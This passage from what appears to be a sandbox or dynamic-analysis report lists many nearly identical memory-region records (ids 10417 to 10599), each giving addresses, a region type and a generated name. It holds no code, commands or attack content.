end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10417 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10418 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10419 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10420 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10421 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10422 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10423 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10424 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10425 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10426 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10427 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10428 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10429 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10430 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10431 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10432 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10433 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10434 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10435 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10436 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10437 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10438 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10439 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10440 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10441 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10442 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10443 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10444 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10445 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10446 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10447 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10448 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10449 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10450 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10451 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10452 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10453 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10454 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10455 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10456 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10457 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10458 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10459 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10460 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10461 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10462 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10463 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10464 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10465 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10466 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10467 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10468 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10469 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10470 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10471 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10472 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10473 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10474 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10475 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10476 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10477 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10478 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10479 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10480 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10481 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10482 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10483 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10484 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10485 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10486 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10487 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10488 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10489 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10490 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10491 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10492 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10493 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10494 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10495 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10496 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10497 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10498 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10499 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10500 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10501 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10502 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10503 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10504 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10505 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10506 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10507 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10508 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10509 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10510 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10511 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10512 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10513 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10514 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10515 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10516 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10517 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10518 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10519 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10520 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10521 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10522 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10523 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10524 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10525 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10526 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10527 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10528 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10529 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10530 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10531 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10532 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10533 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10534 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10535 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10536 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10537 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10538 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10539 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10540 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10541 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10542 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10543 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10544 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10545 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10546 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10547 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10548 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10549 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10550 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10551 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10552 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10553 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10554 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10555 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10556 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10557 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10558 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10559 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10560 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10561 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10562 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10563 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10564 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10565 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10566 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10567 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10568 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10569 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10570 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10571 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10572 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10573 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10574 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10575 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10576 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10577 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10578 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10579 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10580 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10581 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10582 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10583 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10584 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10585 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10586 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10587 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10588 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10589 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10590 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10591 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10592 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10593 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10594 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10595 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10596 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10597 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10598 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10599 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 